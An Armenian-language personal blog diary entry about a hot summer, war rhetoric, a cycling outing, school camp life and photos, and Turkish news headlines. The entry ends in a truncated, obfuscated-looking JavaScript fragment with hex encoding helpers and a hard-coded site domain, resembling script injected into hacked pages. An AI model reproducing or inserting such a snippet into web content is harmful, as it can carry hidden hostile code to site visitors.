Ասում են, որ 2016-ի ամառն ամենաշոգը կլինի պատմության մեջ: Հենց նոր կարդացի, որ գլոբալ տաքացումն արդեն տասը տարի անց Երկրի վրա կարող է սով առաջացնել: Մինչև 2031թ. Աֆրիկայում եգիպտացորեն կարող է չաճել… Իսկ եգիպտացորենն Աֆրիկայի հացն է:
Քաղաքագետ Դավիթ Շահնազարյանն էլ ոչ ավելի, ոչ պակաս կո՞չ է անում. «Առաջիկա անխուսափելի պատերազմին պետք է պատրաստ լինել տնտեսապես, քաղաքականապես և աշխարհաքաղաքական առումով»… Լսեցի՞ք, «անխուսափելի՞ պատերազմին»… Ուր էր, որ Դավիթը Շահնազարյան միակը լիներ… Ես առաջիկայում կանդրադառնամ պատերազմ-խաղաղություն թեմային, որին քսանհինգ տարի, ցավոք, մեր անլուրջ մոտեցումը, տեսեք, ազգային մոբիլիզացիայի դաշտ է ստեղծել։
Կարինե Բաբուջյանի, Արմինե Թոփչյանի, Գայանե Գրիգորյանի, Տաթև Համբարյանի հեծանվաերթն առավոտ շուտ Սեբաստիայի նշանավոր հարթակից՝ Չարենցյան իմ ամենամատչելի կամարից, հայտնագործությունն էր մեր աղջիկների համար… Պատկերացնո՞ւմ եք, հե՛նց Սեբաստիա փողոցի վրա, ամենաաղմկոտ-աշխույժ երթևեկով երևանյան փողոցներից մեկի՝ Սեբաստիայի վրա՝ Չարենցի կամար… Ես այսպիսի կամարների շարք Երևանի տարբեր անկյուններում, երևանամերձ տարածքներում կստեղծեի… Միացեք ինձ, հետևեք ինձ։ Խմբում ինչ-որ բան այն չէր, չասված բան կար, որ հետո պարզվեց։ Այդպես ճամփա չեն գնում, ընկերներ, հեծանվորդներ… Եվ ֆինալը՝ մեր ճամփորդության, որով ես գովազդում էի մեր ճամբարական ուսուցիչներին՝ օր առաջ սկսել ամառային հեծանվաերթերը՝ համոզիչ չէ՞ր… Հեծանիվը, լողը, ճամփորդությունն արշավային, ամենօրյա, կարող են ակումբային-ընկերային-թեթև դարձնել մեր ամառը… Դուք նկատեցի՞ք, մեր ճամբարի առօրյայի կազմակերպումը, որպես հմտությունների փոխանցում-յուրացում, դրան է ուղղված… Մարդասեր-կոնկրետ է ձեր Տիարն իր գործողություններում…
Շախմատ են խաղում Հիմնական դպրոցի 6 տարեկանները:
Լուսանկարները՝ Սրբուհի Ներսիսյանի:
Գեղարվեստի մեծերի լողավազանն այդպես էլ մնում է անձեռնմխելի… Ինչո՞ւ… Երկա՜ր ժամանակ, տարիներ տղաների, տղամարդ ուսուցիչների մեծ խումբ, ես նրանց մեջ, տիար Գևորգն ու անգամ Գրիգոր Խաչատրյանը, Նորայր Այվազյանի «Վաննա լիճ»-ը դարձրել էինք մեր ծովը… Գրիգոր Խաչատրյան, ե՞րբ եք Ձեր խոստացած նախագիծը ներկայացնելու։ Հիմա ի՞նչ է լինելու այս բաց էստրադայի «մեհյան»-ի հետ… Միշտ մաքուր-սառը-կուսակա՞ն… Ակումբային-ամառային տարածք կարող է դառնալ և՛ Դպրոց-պարտեզի լողափը, և՛ Նոր դպրոցի… Չարչարվե՜լ է պետք. արհմիութենական մեր կազմակերպությունն ավելի կարևոր գործեր ունի՝ մարդուն ուղղված…
Ստեփանակերտի մանկապատանեկան ստեղծագործական կենտրոնի պարի խմբի ելույթը Մարմարյա սրահում:
Լուսանկարները՝ Արմինե Մնացականյանի:
Ինչպե՞ս կգործածեն մեր ուսուցիչները Սևանի «Ժայռ»-ը որպես ուսուցչական, նաև ընտանեկան մարզումի-լողի-ընթերցումի կենտրոն… Մենք մի փուլում ենք, որտեղից միայն անձնային-խմբային նախաձեռնությունները կարող են օգտակար լինել, խթանել, տեղից շարժել… Ամառային անշարժությանը-տաղտուկին չտրվե՛ք, հեծանվով, ձիով թե բարձունքին, ծովում թե ավազանում. մարզական, ճամփորդակա՛ն եղեք, թափառումի, արկածի տարերքին տրվե՛ք… այս ամառ, այսօր…
Ես երեկ, իհարկե, ջախջախված էի, խոցված, ու այդպես մինչև ուշ իրիկուն… Հեծանիվն օրվա վերջում ինձ լքեց, այցելեցի իմ եղբայր Թաթոսին՝ հիվանդանոց, ունքը շինելու տեղ աչքն էլ հանեցի… Ո՞ւմ դիմես, ո՞վ կօգնի… Ֆուտբոլն իր համաշխարհային ու եվրոպական առաջնություններով, որ մտածված է մարդկանց զանգվածային զբաղեցման-ձանձրույթի փարատման համար… Չեմ ուզում, չեմ կարող, իրավունք չունեմ այլ բառեր գործածելու, ինձ հերիքում է տասը րոպե… Ես, այո՛, այդքան կարող եմ զարմանալ այս մեծամասշտաբ տեսարանների վրա… Ի՜նչ ռեժիսուրա է. այսքա՜ն մարդ Փարիզ է հասել, հարյուր էդքան՝ էկրանների առաջ… Մի՛ փորձեք բացատրել. իմ սանիկ, մեր կրթահամալիրի երբեմնի աշխատակազմի ղեկավար, «Հայկական ժամանակ»-ի մարզական մեկնաբան, մոլի ֆուտբոլաբան Արմեն Նիկողոսյանն իր կյանքով-գործով չկարողացավ դա անել… Այ, ուրի՜շ բան՝ այս ռեժիսուրային միջամտելը. դրա համար բավարար լիցք ես այսօր չունեմ… Սպասե՛ք ինձ իմ օրագրում…
Շուշան Բլեյանն անհասանելի էր… Մահիճն արժանացավ իմ պաշտամունքին… Ի՜նչ երազներ եմ տեսել, մամա՜ ջան… Գեշ երազներից ճչացել եմ, իհարկե… Քանի՜ անգամ… Ներող լերուք… կանցնի…
Դպրոց-պարտեզի 2-5 տարեկանները Ձորաղբյուրի ձիարշավարանում:
Լուսանկարները՝ Արմինե Աբրահամյանի:
Դավիթ Բլեյանն իր հարեմին, ընկերներին տարել էր Ձորաղբյուրի մեր ձիանքը ցույց տալու, պտտեցնելու… Մայրիկ Արմինեն սքանչացել է իր տղայով, խմբով, ծնողներով, այնքան, որ պատմում է ու պատմում… Դավիթն ինքնուրույն քնել է, արթնացել առավոտ վաղ, ինքնուրույն՝ հիգիենայով անցել, բազմոցին իր պահած ուսումնական ֆիլմերն է վայելում պլանշետով… Լրի՜վ ինքնուրույն տղա-ընկեր, ամառային ճամփորդ…
Բարի՜ առավոտ, ես եմ:
Օրագրի ընթերցարան
- Թուրքիայում հանգստացող ուկրաինացի զբոսաշրջիկների թիվն այս տարի կարող է հասնել մեկ միլիոնի
- Թուրքիայի պաշտպանական արդյունաբերության վաթսուն տոկոսը սեփական արտադրություն է
- Թուրքիայի դպրոցներում բռնկվել է բողոքի ալիք
- Թուրքիան այս տարի ամենաարագ զարգացող հինգ երկրներից մեկն է:
Իմ ընթերցարանն այսօրվա Թուրքիային նվիրված ստացվեց: Մեկ օրվա չորս լուր՝ առանց ընտրության-խմբագրման, ինչպես պնդում եմ հաճախ, «մեր թուրքերի» մասին: Յոթ հարյուր տարի անց ու միասի՞ն… Ճանաչո՞ւմ ենք մեր հարևանին:
Ֆոտոխմբագիր՝ Անահիտ Հարությունյան
# 709
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ashotbleyan.mskh.am"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e